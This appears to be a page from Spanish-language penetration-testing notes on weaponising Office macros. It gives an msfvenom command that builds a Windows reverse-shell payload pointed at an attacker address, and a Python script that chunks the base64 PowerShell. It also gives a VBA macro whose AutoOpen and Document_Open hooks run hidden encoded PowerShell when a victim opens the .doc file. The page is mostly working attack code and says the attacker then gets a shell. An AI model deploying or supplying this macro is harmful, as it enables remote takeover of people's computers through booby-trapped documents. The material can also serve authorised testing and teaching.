Windows Office Macros

Primero utilizar msfvenom para crear una carga útil de reverse_shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.111 LPORT=443 -f hta-psh -o evil.hta

En el archivo evil.hta, verá el script de PowerShell codificado con base64.

Para la macro, la máxima longitud de una cadena es de solo 50 caracteres y, por lo tanto, tenemos que dividirla. Aquí hay un ejemplo de secuencia de comandos de Python:

str = "<powershell script in base64>"
n = 50

for i in range(0, len(str), n):
    print "Str = Str + " + '"' + str[i:i+n] + '"'

Luego de lo anterior podemos crear el Macro en un documento de office 97-2003 con extensión .doc

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -enc "
    Str = Str + ...
    <Pegar el resultado del script en base64>
    CreateObject("Wscript.Shell").Run Str
End Sub

Cuando el cliente de Office abra este documento, obtendras un hermoso shell reverse.

AnteriorGenerating Shellcode and Gaining Shell SiguienteTrucos Generales

Última actualización hace 2 años